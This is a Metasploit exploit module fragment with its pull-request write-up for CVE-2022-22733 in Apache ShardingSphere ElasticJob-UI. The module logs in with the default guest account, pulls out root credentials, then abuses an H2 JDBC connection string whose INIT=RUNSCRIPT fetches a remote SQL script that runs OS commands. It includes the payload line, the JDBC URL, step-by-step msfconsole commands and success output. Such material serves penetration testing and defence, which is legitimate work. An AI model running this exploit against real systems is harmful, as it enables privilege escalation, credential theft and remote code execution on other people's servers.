+    payload = "CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"123\";}';CALL EXEC (\"/bin/bash -c 'echo a > /tmp/test.txt'\")"
     print_status("#{datastore['SRVHOST']}:#{datastore['SRVPORT']} - Sending payload to target...")
     send_response(cli, payload)
   end


### PR DESCRIPTION
# Vulnerable Application
A vulnerability discovered in Apache ShardingSphere ElasticJob-UI known as CVE-2022-22733, The vulnerability lead to exposure of sensitive informatiopns and as a results it allows an attacker who has guest account to do privilege escalation.

You can setup the app using docker: `sudo docker pull apache/shardingsphere-elasticjob-lite-ui:3.0.0`

## Verification Steps
Example steps in this format (is also in the PR):

1. Install the application: `sudo docker pull apache/shardingsphere-elasticjob-lite-ui:3.0.0`
1. Start msfconsole
1. Do: `use exploit/multi/http/apache_shardingsphere_cve_2022_22733`
1. Do: `set RHOSTS target`
1. Do: `set JDBC URL_to_your_malicious_sql_script`
1. Do: `exploit`
3. You should get `root` account credentials.

## Options
- `JDBC`: Payload URL for JDBC Attack ex: http://ip:8000/poc.sql.
- `PASSWORD`: Password for authentication.
- `Proxies`: A proxy chain of format type:host:port[,type:host:port][...]
- `RHOSTS`: The target host(s)
- `RPORT`: The target port (TCP)
- `SSL`: Negotiate SSL/TLS for outgoing connections
- `USERNAME`: The username to authenticate with
- `VHOST`: HTTP server virtual host


### Option Name

- `JDBC`: Payload URL for JDBC Attack ex: http://ip:8000/poc.sql. Which is used to add the url for your malicious sql script in the request to perform JDBC attack. And it's required.
- `PASSWORD`: The password for the low-privileged account that you have, the default value is `guest` that comes with the application, The user can change if he already has an account. And it's required.
- `Proxies`: A proxy chain of format type:host:port[,type:host:port][...]
- `RHOSTS`: The target domain/IP. And it's required.
- `RPORT`: The target port to the application, The default port that the application always use is `8088`. And it's required.
- `SSL`: Negotiate SSL/TLS for outgoing connections. In case the target uses SSL. And by default is not required.
- `USERNAME`: The username for the low-privileged account that you have, the default value is `guest` that comes with the application, The user can change if he already has an account. And it's required.
- `VHOST`: HTTP server virtual host and it's not required.

## Scenarios
### The `JDBC` option in case you don't know what is it, You can check it from [here](https://pyn3rd.github.io/2022/06/06/Make-JDBC-Attacks-Brillian-Again-I/).
Basically, If you have a privileged account like the `root` account, You will be able to create a database base connection.
Now, You may be wondering, If we have the root account credentials, Why we would need to Retrieve it's token ?. So, Basically to perform a connection throug the JDBC we need high-privileges and to automate this process let's see how it works first. 

![image](https://github.com/rapid7/metasploit-framework/assets/62406753/4e4be243-bc34-417c-aadf-faa157acce9e)

As you can see when we logged-in as guest we are not able to add any data source. But, If we login with the root account. We can see that we have the privileges to add data source and test the connection:

![image](https://github.com/rapid7/metasploit-framework/assets/62406753/06ac9719-2827-4062-ad98-aca4fc4b41e4)

Now, Under the Event Tracer Data Source click on Add button and add the following:

![image](https://github.com/rapid7/metasploit-framework/assets/62406753/f1d30e53-fb6f-4e5f-805f-6bf0ff0dca1f)

What did we done here?. We named Our data source, then used the h2 driver the H2 itself is a relational database management system, and the org.h2.driver is a JDBC driver used to connect to an H2 database from Java. The URL value:

```
jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql'
```

Basically, This is a JDBC connection string which will connect a H2 in memory database with the name we give which is testdb. Then, `TRACE_LEVEL_SYSTEM_OUT=3` parameter enables trace logging to be printed to the console. Finally, `INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql'` parameter specifies that the `poc.sql` script located at our URL should be executed when the database is initialized. But, What is inside poc.sql file ?:

```
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('calc.exe')
```

In short words, This sql script uses the H2 database ability to create an alias to execute command and here we executing calc.exe for the demo of the exploit. Now, Let's start our http server that will host our poc.sql script and after that we click on Test Connect Button:

![firefox_aYpCgKHiha](https://github.com/rapid7/metasploit-framework/assets/62406753/378be99e-29d8-49e5-888b-538c5b6eeb62)


Now, As we understand it clearly we can run our metasploit module to perform all of these.

![vmware_4p7AtSwR60](https://github.com/rapid7/metasploit-framework/assets/62406753/7b6dcf50-7e77-4c92-8904-7ab6c00f0162)
```
[*] Attempting to authenticate...
[+] Authenticated Successfully
[*] Root username: root
[*] Root password: root
[*] Attempting to authenticate with root credentials...
[+] Authenticated with root credentials successfully
[*] Attempting JDBC attack...
[+] JDBC attack successful
```

For example:

To use it with the default config:

```
msf6 exploit(multi/http/apache_shardingsphere_cve_2022_22733) > set RHOSTS 192.168.0.162
RHOSTS => 192.168.0.162
msf6 exploit(multi/http/apache_shardingsphere_cve_2022_22733) > set JDBC http://192.168.0.162:8000/poc.sql
JDBC => http://192.168.0.162:8000/poc.sql
msf6 exploit(multi/http/apache_shardingsphere_cve_2022_22733) > exploit
```

# Reference
 You can read the vulnerability analysis from [Here](https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation) & The exploit blog step by step from [Here](https://www.vicarius.io/vsociety/blog/unique-exploit-cve-2022-22733-privilege-escalation-and-rce).